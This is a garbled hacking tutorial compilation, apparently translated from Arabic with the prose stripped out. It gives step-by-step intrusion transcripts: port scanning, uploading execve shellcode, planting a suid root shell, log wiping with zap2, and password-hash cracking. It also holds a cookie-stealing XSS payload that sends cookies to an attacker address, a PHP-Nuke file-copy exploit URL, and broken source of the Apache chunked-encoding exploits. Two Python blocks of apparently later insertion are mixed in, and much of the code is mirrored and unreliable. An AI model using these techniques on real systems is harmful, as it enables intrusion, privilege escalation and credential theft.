bash-2.03$ rpm -i nmap-2.53-1.i386.rpm
. ..
. target.edu
..
:
bash-2.03$ nmap -sS target.edu
nmap .
!! .
daemons target.edu
..
.. ..
.. ..
..
... TCP :
bash-2.03$ telnet target.edu 21
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu FTP server (SunOS 5.6) ready.
quit
221 Goodbye.
Connection closed by foreign host.
(:
SunOS 5.6 . -1
standard -2
sunOS
:
bash-2.03$ telnet target.edu 25
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0400 (EDT)
quit
221 2.0.0 target.edu closing connection
Connection closed by foreign host.
smtp
sendmail
8.11.0/8.9.3
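The banners the text collects by hand on ports 21, 25 and 80 (the wu-2.6.0 FTP greeting earlier and the SunOS and Sendmail replies here), as an added Python example that is not from the original text: turning them into structured product/version/OS fingerprints. The banner strings are taken from this document (the Apache Server header is a constructed value in the 1.3 series the text mentions); the regexes and the Fingerprint type are this example's own.

```python
# Added example: structured fingerprints from the banners the text collects.
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Fingerprint:
    service: str
    product: Optional[str]
    version: Optional[str]
    os_hint: Optional[str]


# Service, regex. Named groups: product, version, os. Order matters: first match wins.
PATTERNS = [
    ("ftp", re.compile(r"^220 .*?\(Version (?P<product>wu)-(?P<version>[\d.]+(?:\(\d+\))?)")),
    ("ftp", re.compile(r"^220 .*?FTP server \((?P<os>SunOS [\d.]+)\) ready")),
    ("ftp", re.compile(r"^220 .*?(?P<product>Microsoft FTP Service) \(Version (?P<version>[\d.]+)\)")),
    ("smtp", re.compile(r"^220 .*?ESMTP (?P<product>Sendmail) (?P<version>[\w./]+);")),
    ("http", re.compile(r"^Server: (?P<product>Apache)/(?P<version>[\d.]+)")),
]

# What the product name alone says about the platform (assumed table).
OS_BY_PRODUCT = {"Microsoft FTP Service": "Windows NT"}


def fingerprint(banner: str) -> Optional[Fingerprint]:
    """Return the first matching fingerprint, or None for an unknown banner."""
    for service, pat in PATTERNS:
        m = pat.search(banner.strip())
        if m:
            g = m.groupdict()
            product = g.get("product")
            return Fingerprint(service, product, g.get("version"),
                               g.get("os") or OS_BY_PRODUCT.get(product))
    return None


def fingerprint_all(banners: List[str]) -> List[Fingerprint]:
    """Fingerprints in input order; unknown banners are skipped."""
    return [fp for fp in (fingerprint(b) for b in banners) if fp is not None]


BANNERS = [  # copied from the sessions in the text; the Apache line is constructed
    "220 www.target.com FTP server (Version wu-2.6.0(1) Mon Mar 6 13:54:16 SAST 2000) ready.",
    "220 target.edu FTP server (SunOS 5.6) ready.",
    "220 websrv1 Microsoft FTP Service (Version 4.0).",
    "220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0400 (EDT)",
    "Server: Apache/1.3.24",
    "220 hello",
]
```

The product and version pair is what you look up on the advisory sites the text lists; the os_hint is what decides which of the exploit variants (the text's "Red Hat 6.2" style targets) is even worth compiling.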
..
daemon . ..
:
nmap
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp
23/tcp     open        telnet
25/tcp     open        smtp
80/tcp     open        http
110/tcp    open        pop3
.
..
..
...
Ss-
=D
:
bash-2.03$ man nmap
..
)
(
:
bash-2.03$ ls
program.c
sh-2.03$ ftp shell.com
Connected to shell.com.
220 shell.com FTP server (SunOS 5.6) ready.
Name: luser
331 Password required for luser.
Password:
230 User luser logged in.
ftp> put program.c
200 PORT command successful.
150 ASCII data connection for program.c (204.42.253.18,57982).
226 Transfer complete.
ftp> quit
221 Goodbye.
ftp
.
.
.
sh-2.03$ vi exploit.c
c.
.
.
.. TARGET.EDU
.
sendmail 8.11.0
..
:
http://www.pharaonics.net/less/NEtworks/124.htm
. .
.. )
(
..
....
..
..
:
www.securityfocus.com
www.insecure.org/sploits.html
..
..
...
. ) (
.
shell code
. ..
.
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";
.. .
bin/sh/
.
. ..
.
...
.. .
..
bash-2.03$ telnet myshellaccount 23
Trying xx.xx.xx.xx...
Connected to yourshellaccount.
root
.. =(
..
.
local
....
) =((
.. =<
-: .. ..
.
. ..
..
edu.
.
microsoft.com , ibm.com etc
...
..
<----- <------
.
.. exit
.
.
..
...
..
..
... =| =|
.
=| !!!!!!
(= ...
.
..
..
-1 sushi
. sushi suid shell
. bin/sh/
. suid
:
sh-2.03$ cp /bin/sh /dev/nul
.. dev
null
= D =D
sh-2.03$ cd /dev
sh-2.03$ chown root nul
-:
sh-2.03$ chmod 4775 nul
4775 suid .
chmod +s nul
..
..
..
sh-2.03$ exit
80. = D
:
sh-2.03$ whoami
luser
sh-2.03$ /dev/nul
sh-2.03$ whoami
root
=(
..
suid
sushi
sash A
stand-alone shell
...
suid /
bin/sh sushi
-2
/
etc/passwd
-: vi
sh-2.03$ vi /etc/passwd
. .
vi
luser:passwd:uid:gid:startdir:shell
.
TCP UDP
..
TCP
UDP
-: . .. .
..
..
Last login: Sun Sep 24 10:32:14 from <yourIPaddress>
-:
..
..
=(
usr/adm/lastlog/
var/adm/lastlog/
var/log/lastlog/
. lled
..
. ...
. ftp
. wted lled
who
sh-2.03$ who
Sep 25 18:18
tty1
root
. zap2
: luser
sh-2.03$ ./zap2 luser
!Zap2
sh-2.03$ who
sh-2.03$
:
..
.
"
"
> <
> : <
...
.
. .
.
FreeServers.com
. :
.
.
.
.
.
.
Caller ID
...
notepade
Hakkerz.home.ml.org
html
@Blahblahblah
.
.
header
.
IP
Whois
. finger
@Finger
. scan ports
IP
Linux /Unix systems
Exploit Generator
. linux
21
FTP 23
TelNet
Telnet
Anonymous
. .
hakkerz.home.ml.org
telnet 23
www
telnet.Victim.com telnet
www
whois
21
ftp
SYST
80 http
What's Running?
.
.
Login: root$
Password: root$
linux
. . telnet
.
ACCOUNT: PASSWORD
whois
.
unix .
passwd
. ftp
. internet
explorer
. IP
jammer
.hakkerz.home.ml.org
.
ftp:// abc.net /ftp://ftp.abc.net
ftp
whois
\ etc
passwd
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
[etc.]
kangaroo .
3a62i9qr
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
* s ?xs
John the Ripper 1.5
.
:
PHP Shell
**-----------------------------------------------
:
**-----------------------------------------------
ls -a :
**-----------------------------------------------
cat -e : cat
**-----------------------------------------------
rm -f :
**-----------------------------------------------
rm -d :
**-----------------------------------------------
cp -i :
**-----------------------------------------------
mv :
**-----------------------------------------------
:
--
help
ls --help :
**-----------------------------------------------
**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------
-1
-2
-3
-4
-5
**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------
!!!
-1
: hacked.txt
**-----------------------------------------------
-2
**-----------------------------------------------
-3 .
**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------
PHP Shell 2
.
**-----------------------------------------------
-1 My SQL
config.php
PHP Shell
cat config.php
**-----------------------------------------------
-2 htpasswed.
htaccess.
:
/home/site/.htpasswds/forum/admin/passwd
cat:
cat /home/site/.htpasswds/forum/admin/passwd
DES
user:nymw4oS3oerdY
**-----------------------------------------------
-3
: service.pwd
DES
:
_vti_pvt
cat /home/site/www/_vti_pvt/service.pwd
: DeXXa
user:nymw4oS3oerdY
**-----------------------------------------------
-4 :
phpMyAdmin
config.php
!!
ls -a /home/SITE
= SITE
**-----------------------------------
-2 :
home
:
:
/home/site/public_html
/home/site/www
**-----------------------------------
-3
.
.
.
:
UDP
TCP connect()
TCP SYN (half open)
ftp proxy (bounce attack)
Reverse-ident
ICMP (ping sweep)
FIN
ACK sweep
Xmas Tree
SYN sweep
and Null scan.
. ..:
remote OS detection via TCP/IP fingerprinting
stealth scanning
dynamic delay and retransmission calculations
parallel scanning
detection of down hosts via parallel pings
decoy scanning
port filtering detection
direct (non-portmapper) RPC scanning
fragmentation scanning
flexible target and port specification
.
)(
)(
:
. .
TCP sequencability
.
"
"
> <
><network access :
.
.
.
.
)
(
%50
%50
. .
. . .
aswind.COM
ip
INTERNIC.NET
INTERNIC.NET
:
nslookup
> set type=ALL
> aswind.COM

Domain Name: ASWIND.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.OnlineNIC.com
Referral URL: http://www.onlinenic.com/
Name Server: DNS.ASWIND.COM
DNS
.
HowIS
IP
LMHOSTS
NetBios IP
C
200.200.200.0 LMHOSTS
NetBios = N2
200.200.200.2 Net
view //servername N1
N254
1 254
.
\
Administrator
Windows
.
username and password
net user
. . .
.
. . .
Messenger Service .
NetBios
. IP 200.200.200.200
nbtstat -a 200.200.200.200
.
MSBROWSER )
(
John IP
200.200.200.50
Nbtstat -a 200.200.200.50
john
johnPC
. )
( Administrator
. Messenger Service
)
(
MSBROWSER
nbtstat -a
.
nt senstiver
)
(.
L0phtCrack.
:
* .
.
* VBULLETIN
YaBB and UBB
*.
*
=============================
=============================
=============================
=========
:
...
...
=============================
=============================
=============================
=========
:
...
.
.
:
HTML
<script>document.write('<img src="http://my_ip_address/'+document.cookie+'">');</script>
<A HREF="http://example.com/comment.cgi?mycomment=<SCRIPT>malicious code</SCRIPT>"> Click here</A>
comment.cgi
mycomment
. .
:
<A HREF="http://example.com/comment.cgi?mycomment=<SCRIPT SRC='http://badsite/badfile'></SCRIPT>"> Click here</A>
.
BADFILE
.
cross-site scripting
" " .
CSS
cross-site scripting
CASCADE style sheets
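The comment.cgi reflection described above, as an added Python example that is not part of the original text: render the mycomment parameter the way a vulnerable script would, then with output encoding. The page template is an assumption; the two payloads are the ones quoted from the CERT advisory.

```python
# Added example: the comment.cgi reflection, vulnerable and fixed.
# The template is assumed; the payloads are the ones quoted in the text.
import html
import re
from urllib.parse import parse_qs, quote, urlsplit

# Payloads quoted in the text (CERT CA-2000-02).
COOKIE_THEFT = ("<script>document.write('<img src=\"http://my_ip_address/'"
                "+document.cookie+'\">');</script>")
REMOTE_SCRIPT = "<SCRIPT SRC='http://badsite/badfile'></SCRIPT>"

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def malicious_link(comment: str) -> str:
    """The 'Click here' URL the attacker sends: the payload travels in mycomment=."""
    return "http://example.com/comment.cgi?mycomment=" + quote(comment, safe="")


def comment_from_url(url: str) -> str:
    """What comment.cgi sees once the web server has decoded the query string."""
    return parse_qs(urlsplit(url).query).get("mycomment", [""])[0]


def render_vulnerable(comment: str) -> str:
    """Assumed template: the parameter is pasted straight into the page."""
    return f"<p>Your comment: {comment}</p>"


def render_fixed(comment: str) -> str:
    """Output encoding: < > & \" ' become entities, so the browser shows text and runs nothing."""
    return f"<p>Your comment: {html.escape(comment, quote=True)}</p>"


def contains_active_script(page: str) -> bool:
    """Crude check for the demonstration: is there a live <script> tag in the output?"""
    return bool(SCRIPT_TAG.search(page))
```

The fix is applied at output, not at input: the same comment text stays intact in the database, and it is the context it is written into (here an HTML element body) that decides which characters must become entities.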
=============================
============================
:
http://www.cert.org/advisories/CA-2000-02.html
http://www.perl.com/pub/a/2002/02/20/css.html
" "
> <
> :<
,
...
, - - -
- ......
........... :
.
.
.
.
.
.
.
.
.
.
.
.
.
:
=============================
=====================
=
<h3>put your text here<xmp><plaintext>
=============================
=====================
:
=====
!
" "
> <
><Dr^FunnY :
...
html
.....
...
"
"
"
... "HTML ...
(:
.
.
" "
> <
= Exploit =
:
.
..
:
-1
super scan
.
-2 . .
.
. .
.
www.netcraft.net
!.!!..
. ...
-3
-4
/....../www.thesite.com
:
*pl.
Active Perl
* c.
*sh.
www.securiteam.com
www.securityfocus.com
www.ukrt.f2s.com
www.ussrback.com
www.packetstorm.securify.com
www.secureroot.com
www.rootshell.com
.
.
..
shadowed .encryption
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:

root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh
= root .
= x
shadowed
shadow file
= token
OS          shadow file                            token in /etc/passwd
Linux       /etc/shadow                            x
SunOS       /etc/shadow                            x
FreeBSD     /etc/master.passwd or /etc/shadow      * (or x)
IRIX        /etc/shadow                            x
AIX         /etc/security/passwd                   !
ConvexOS    /etc/shadow or /etc/shadpw             *
root:EpGw4GekZ1B9U:11390::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:IyEDQ6VoRlLHM:10935::::::
#admin:9z8VMm6Ovcvsc:10935::::::
lp:NP:6445::::::
EpGw4GekZ1B9U
John the ripper
.
.
x
:
john passwd
passwd
:
john.pot
.
.
" "
> <
>< icer :
. :
1
2 )
(
3 ...
4 ...
....
DoS
.
. DoS GET /
POST
OVERLOAD
)
24 (
.... OFFLINE
..
. ..
. ..
threads
cgi scaners
..
...
<<< shadow security scaner
.....
rootshell.com
red hat 7.2
...... red hat 7.2
2
)
( shadow
..
...
url
.. ..
url
rootshell.com
%99
..
.......
3 :
..
..
commands ..
, http BOF
..
..
....
config.inc
... DES/MD5 /
.... etc/passwd ...
.
DoS
. DoS
...
..
4 :
:
packetstorm.securify.com
/.securityfocus.com
/www.insecure.org
/www.rootshell.com
.(:
" "
><
><oOoDa BE$T :
:
txt. :
..
,..
..
c. :
..
..
)_ (compile
)(_ .
...
.. Linux
.. Shell Account
:
>---- gcc filenmae.c
:
>--- a.out ..
..
:
a.out xxx.xxx.xxx.xxx/.
:
pl. :
Linux ..
Shell Account
: exploit
perl filename.pl xxx.xxx.xxx.xxx
filename xxx.xxx.xxx.xxx/.
"
"
> .<
><DeadLine :
:
:
Microsoft-IIS/5.0 on Windows 2000
98
.
98 :
Web Folders :
:
:
My Computer
My Computer
Web Folders
:
Add Web Folder
: Add Web Folder
Type the location to add
. :
/http://hostname.com
hostname
:
mail.talcar.co.il
daihatsu-israel.co.il
daewoo-israel.co.il
:
/http://192.117.143.121
Next :
:
finish
Web Folder :
:
http://www.israwine.co.il/
212.199.43.84
:
.
" "
<>
>Arab VireruZ :>
:
twlc: here your 0day from LucisFero and supergate
Posted on Monday, September 24 @ 14:25:58 CDT
topic: advisories

twlc security division
24/09/2001
Php nuke BUGGED.
Found by: LucisFero and supergate
./twlc

Summary
This time the bug is really dangerous... it allows you to 'cp' any file on the box... or even upload files...

Systems Affected
all the versions ARE vulnerable except '5.0 RC1' (i wonder why a released c. is ok while the final 5.2 is bugged)

Explanation
Do you need sql password?
http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt
if($cancel) $op="FileManager";
if($upload) {
    copy($userfile,$basedir.$wdir.$userfile_name);
    $lastaction = ""._UPLOADED." $userfile_name --> $wdir";
    // This need a rewrite   <------------------------------------- OMG! WE TOTALY AGREEEEEEEE lmao
    //include("header.php");
    //GraphicAdmin($hlpfile);
    //html_header();
    //displaydir();
    $wdir2="/";
    chdir($basedir . $wdir2);
    //CloseTable();
    //include("footer.php");
    Header("Location: admin.php?op=FileManager");
    exit;
}
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=
:
http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
http://www.server.net/admin.php?upload=1&file=config.php&file_name=ultramode.txt&wdir=/&userfile=config.php&userfile_name=ultramode.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=
:
= config.php ultramode.txt
(-:
http://server.com/ultramode.txt
=-
-1 server.com
-2 :
http://server.com/nuke
-3 5.2
.
> <angels-bytes
Chunked Apache
. angels-bytes
Retina
Apache Chunked Scanner
. 254
.
2.0.39
http://www.apache.org/dist/httpd/binaries
1.3.24 2 2
dev-2.0.36
))*/ angels-
bytes.com ((
/*
/** /
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
define#
MEMCPY_s1_OWADDR_DELTA
-146
define PADSIZE_1 4#
define PADSIZE_2 5#
define PADSIZE_3 7#
define#
SHELLCODE_LOCALPORT_OFF 30
= []char shellcode
\\\\ "\\\
x89\\\\xe2\\\\x83\\\\xec\\\\x10\\\\x6a\\\\x
\10
\\\
x54\\\\x52\\\\x6a\\\\x00\\\\x6a\\\\x00\\\\x
\\b8
"\\\x1f\\
\\\\ "\\\
x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x80\\\\x
\7a
\\\
x01\\\\x02\\\\x75\\\\x0b\\\\x66\\\\x81\\\\x
\\7a
"\\\x02\\
\\\\ "\\\
x42\\\\x41\\\\x75\\\\x03\\\\xeb\\\\x0f\\\\x
\90
\\\
xff\\\\x44\\\\x24\\\\x04\\\\x81\\\\x7c\\\\x
\\24
"\\\x04\\
\\\\ "\\\
x00\\\\x01\\\\x00\\\\x00\\\\x75\\\\xda\\\\x
\c7
\\\
x44\\\\x24\\\\x08\\\\x00\\\\x00\\\\x00\\\\x
\\00
"\\\xb8\\
\\\\ "\\\
x5a\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x
\ff
\\\
x44\\\\x24\\\\x08\\\\x83\\\\x7c\\\\x24\\\\x
\\08
"\\\x03\\
\\\\ "\\\
x75\\\\xee\\\\x68\\\\x0b\\\\x6f\\\\x6b\\\\x
\0b
\\\
x81\\\\x34\\\\x24\\\\x01\\\\x00\\\\x00\\\\x
\\01
"\\\x89\\
\\\\ "\\\
xe2\\\\x6a\\\\x04\\\\x52\\\\x6a\\\\x01\\\\x
\6a
\\\
x00\\\\xb8\\\\x04\\\\x00\\\\x00\\\\x00\\\\x
\\cd
"\\\x80\\
\\\\ "\\\
x68\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x68\\\\x
\2f
\\\
x62\\\\x69\\\\x6e\\\\x89\\\\xe2\\\\x31\\\\x
\\c0
"\\\x50\\
\\\\ "\\\
x52\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x52\\\\x
\50
\\\
xb8\\\\x3b\\\\x00\\\\x00\\\\x00\\\\xcd\\\\
\\x80
;"\\\xcc\\
} struct
;char *type
;u_long retaddr
targets[] = { // hehe, yes theo, that {
!say OpenBSD here
OpenBSD 3.0 x86 / Apache"\\\ }
,{ 1.3.20\\\", 0xcf92f
OpenBSD 3.0 x86 / Apache"\\\ }
,{ 1.3.22\\\", 0x8f0aa
OpenBSD 3.0 x86 / Apache"\\\ }
,{ 1.3.24\\\", 0x90600
OpenBSD 3.1 x86 / Apache"\\\ }
,{ 1.3.20\\\", 0x8f2a6
OpenBSD 3.1 x86 / Apache"\\\ }
,{ 1.3.23\\\", 0x90600
OpenBSD 3.1 x86 / Apache"\\\ }
,{ 1.3.24\\\", 0x9011a
OpenBSD 3.1 x86 / Apache"\\\ }
} (if(argc != 3
;([printf(\\\"Usage: %s \\\\n\\\", argv[0
printf(\\\" Using targets:\\\\t./apache;("\\\scalp 3 127.0.0.1:8080\\\\n
printf(\\\" Using
bruteforce:\\\\t./apache-scalp
;("\\\0x8f000 127.0.0.1:8080\\\\n
else
;bruteforce = 1
;(()srand(getpid
;(signal(SIGPIPE, SIG_IGN
for(owned = 0, progress = 0;;retaddr
} (+= RET_ADDR_INC
/* skip invalid return adresses */
;i = retaddr & 0xff
(if(i == 0x0a || i == 0x0d
;++retaddr
else if(memchr(&retaddr, 0x0a, 4) ||
((memchr(&retaddr, 0x0d, 4
;continue
sock = socket(AF_INET,
;(SOCK_STREAM, 0
;sin.sin_family = AF_INET
sin.sin_addr.s_addr =
;(inet_addr(hostp
;((sin.sin_port = htons(atoi(portp
(if(!progress
;("\\\ ..printf(\\\"\\\\n[*] Connecting
;(fflush(stdout
if(connect(sock, (struct sockaddr *)
} (& sin, sizeof(sin)) != 0
;("\\\()perror(\\\"connect
;(exit(1
{
(if(!progress
;("\\\printf(\\\"connected!\\\\n
;(exit(1
{
;(lport = ntohs(from.sin_port
shellcode[SHELLCODE_LOCALPOR
;T_OFF + 1] = lport & 0xff
shellcode[SHELLCODE_LOCALPOR
;T_OFF + 0] = (lport >> 8) & 0xff
p = expbuf = malloc(8192 +
((PADSIZE_3 + NOPCOUNT + 1024)
(* REP_SHELLCODE
PADSIZE_1 + (REP_RET_ADDR *)) +
4) + REP_ZERO + 1024) *
;((REP_POPULATOR
PUT_STRING(\\\"GET /
HTTP/1.1\\\\r\\\\nHost: apache;("\\\scalp.c\\\\r\\\\n
(++for (i = 0; i < REP_SHELLCODE; i
}
;("\\\-PUT_STRING(\\\"X
PUT_BYTES(PADSIZE_3,
;(PADDING_3
;("\\\ :"\\\)PUT_STRING
;(PUT_BYTES(NOPCOUNT, NOP
memcpy(p, shellcode,
;(sizeof(shellcode) - 1
;p += sizeof(shellcode) - 1
;("\\\PUT_STRING(\\\"\\\\r\\\\n
{
(++for (i = 0; i < REP_POPULATOR; i
}
;("\\\-PUT_STRING(\\\"X
PUT_BYTES(PADSIZE_1,
;(PADDING_1
;("\\\ :"\\\)PUT_STRING
} (++for (j = 0; j < REP_RET_ADDR; j
;p++ = retaddr & 0xff*
;p++ = (retaddr >> 8) & 0xff*
;p++ = (retaddr >> 16) & 0xff*
;++progress
(if((progress%70) == 0
;progress = 1
} (if(progress == 1
;((memset(buf, 0, sizeof(buf
sprintf(buf, \\\"\\\\r[*] Currently using
retaddr 0x%lx, length %u, localport
,"\\\%u
retaddr, (unsigned int)(p - expbuf),
;(lport
memset(buf + strlen(buf), \\' \\', 74 ;((strlen(buf
;(puts(buf
(if(bruteforce
;('\\;'\\)putchar
{
else
;('\\putchar((rand()%2)? \\'P\\': \\'p
;(fflush(stdout
} (while (1
;fd_set fds
;int n
;struct timeval tv
;tv.tv_sec = EXPLOIT_TIMEOUT
;tv.tv_usec = 0
;(FD_ZERO(&fds
;(FD_SET(0, &fds
;(FD_SET(sock, &fds
;((memset(buf, 0, sizeof(buf
if(select(sock + 1, &fds, NULL,
} (NULL, &tv) > 0
} ((if(FD_ISSET(sock, &fds
if((n = read(sock, buf, sizeof(buf) (1)) <= 0
;break
if(!owned && n >= 4 &&
memcmp(buf, \\\"\\\\nok\\\\n\\\", 4) ==
} (0
printf(\\\"\\\\nGOBBLE GOBBLE!@#
;("\\\%%)*#\\\\n
printf(\\\"retaddr 0x%lx did the
;(trick!\\\\n\\\", retaddr
sprintf(expbuf, \\\"uname -a;id;echo
hehe, now use 0day OpenBSD local
kernel exploit to gain instant
;("\\\r00t\\\\n
;((write(sock, expbuf, strlen(expbuf
;++owned
{
;(write(1, buf, n
{
} ((if(FD_ISSET(0, &fds
if((n = read(0, buf, sizeof(buf) - 1)) <
(0
;(exit(1
;(write(sock, buf, n
{
{
(if(!owned
;break
{
;(free(expbuf
;(close(sock
(if(owned
;return 0
} (if(!bruteforce
fprintf(stderr, \\\"Ooops..
;("\\\hehehe!\\\\n
;return -1
{
{
;return 0
{
:Exploit #2
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
__ifdef __linux#
include#
endif#
define PADSIZE_1 4#
define PADSIZE_2 5#
define PADSIZE_3 7#
;memset(p, b, n); p += n
= []char shellcode
\\\\ "\\\
x68\\\\x47\\\\x47\\\\x47\\\\x47\\\\x89\\\\x
\e3
\\\
x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\x
\\c6
"\\\x04\\\\x24\\
\\\\ "\\\
x04\\\\x53\\\\x50\\\\x50\\\\x31\\\\xd2\\\\x
\31
\\\
xc9\\\\xb1\\\\x80\\\\xc1\\\\xe1\\\\x18\\\\x
\\d1
"\\\xea\\\\x31\\
\\\\ "\\\
xc0\\\\xb0\\\\x85\\\\xcd\\\\x80\\\\x72\\\\
\x02
\\\
x09\\\\xca\\\\xff\\\\x44\\\\x24\\\\x04\\\\x
\\80
"\\\x7c\\\\x24\\
\\\\ "\\\
x04\\\\x20\\\\x75\\\\xe9\\\\x31\\\\xc0\\\\x
\89
\\\
x44\\\\x24\\\\x04\\\\xc6\\\\x44\\\\x24\\\\x
\\04
"\\\x20\\\\x89\\
\\\\ "\\\
x64\\\\x24\\\\x08\\\\x89\\\\x44\\\\x24\\\\x
\0c
\\\
x89\\\\x44\\\\x24\\\\x10\\\\x89\\\\x44\\\\x
\\24
"\\\x14\\\\x89\\
\\\\ "\\\
x54\\\\x24\\\\x18\\\\x8b\\\\x54\\\\x24\\\\x
\18
\\\
x89\\\\x14\\\\x24\\\\x31\\\\xc0\\\\xb0\\\\x
\\5d
"\\\xcd\\\\x80\\
\\\\ "\\\
x31\\\\xc9\\\\xd1\\\\x2c\\\\x24\\\\x73\\\\x
\27
\\\
x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\x
\\ff
"\\\x04\\\\x24\\
\\\\ "\\\
x54\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x2
\4
\\\
xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\x5
\\1
"\\\x50\\\\xb0\\
\\\\ "\\\
x1d\\\\xcd\\\\x80\\\\x58\\\\x58\\\\x58\\\\
\x58
\\\
x58\\\\x3c\\\\x4f\\\\x74\\\\x0b\\\\x58\\\\x
\\58
"\\\x41\\\\x80\\
\\\\ "\\\
xf9\\\\x20\\\\x75\\\\xce\\\\xeb\\\\xbd\\\\x
\90
\\\
x31\\\\xc0\\\\x50\\\\x51\\\\x50\\\\x31\\\\x
\\c0
"\\\xb0\\\\x5a\\
\\\\ "\\\
xcd\\\\x80\\\\xff\\\\x44\\\\x24\\\\x08\\\\x
\80
\\\
x7c\\\\x24\\\\x08\\\\x03\\\\x75\\\\xef\\\\x
\\31
"\\\xc0\\\\x50\\
\\\\ "\\\
xc6\\\\x04\\\\x24\\\\x0b\\\\x80\\\\x34\\\\x
\24
\\\
x01\\\\x68\\\\x42\\\\x4c\\\\x45\\\\x2a\\\\x
\\68
"\\\x2a\\\\x47\\
\\\\ "\\\
x4f\\\\x42\\\\x89\\\\xe3\\\\xb0\\\\x09\\\\x
\50
\\\
x53\\\\xb0\\\\x01\\\\x50\\\\x50\\\\xb0\\\\
\\x04
"\\\xcd\\\\x80\\
\\\\ "\\\
x31\\\\xc0\\\\x50\\\\x68\\\\x6e\\\\x2f\\\\x
\73
\\\
x68\\\\x68\\\\x2f\\\\x2f\\\\x62\\\\x69\\\\x
\\89
"\\\xe3\\\\x50\\
\\\\ "\\\
x53\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x53\\\\x
\50
;"\\\xb0\\\\x3b\\\\xcd\\\\x80\\\\xcc \\\
;
} struct
char *type; /* description for newbie
/* penetrator
,{ 42
NetBSD 1.5.2 x86 / Apache"\\\ }
1.3.24 (Unix)\\\", -90, 0x80efa00, 5,
,{ 42
;victim ,{
} (void usage(void
;int i
printf(\\\"GOBBLES Security
Labs\\\\t\\\\t\\\\t\\\\t\\\\t- apache;("\\\nosejob.c\\\\n\\\\n
printf(\\\"Usage: ./apache-nosejob <;("\\\switches> -h host[:80]\\\\n
printf(\\\" -h host[:port]\\\\tHost to
;("\\\penetrate\\\\n
printf(\\\" -t #\\\\t\\\\t\\\\tTarget
;("\\\id.\\\\n
printf(\\\" Bruteforcing options (all
required, unless -o is
;("\\\used!):\\\\n
printf(\\\" -o char\\\\t\\\\tDefault
values for the following
;("\\\OSes\\\\n
printf(\\\" \\\\t\\\\t\\\\t(f)reebsd,
;("\\\(o)penbsd, (n)etbsd\\\\n
printf(\\\" -b 0x12345678\\\\t\\\\tBase
;("\\\address used for bruteforce\\\\n
printf(\\\" \\\\t\\\\t\\\\tTry
0x80000/obsd, 0x80a0000/fbsd,
;("\\\0x080e0000/nbsd.\\\\n
printf(\\\" -d -nnn\\\\t\\\\tmemcpy()
delta between s1 and addr to
;("\\\overwrite\\\\n
printf(\\\" \\\\t\\\\t\\\\tTry -146/obsd,
;("\\\-150/fbsd, -90/nbsd.\\\\n
printf(\\\" -z #\\\\t\\\\t\\\\tNumbers of
time to repeat \\\\\\\\0 in the
;("\\\buffer\\\\n
printf(\\\" \\\\t\\\\t\\\\tTry 36 for
openbsd/freebsd and 42 for
;("\\\netbsd\\\\n
printf(\\\" -r #\\\\t\\\\t\\\\tNumber of
times to repeat retadd in the
;("\\\buffer\\\\n
printf(\\\" \\\\t\\\\t\\\\tTry 6 for
openbsd/freebsd and 5 for
;("\\\netbsd\\\\n
;("\\\printf(\\\" Optional stuff:\\\\n
printf(\\\" -w #\\\\t\\\\t\\\\tMaximum
number of seconds to wait for
;("\\\shellcode reply\\\\n
printf(\\\" -c cmdz\\\\t\\\\tCommands
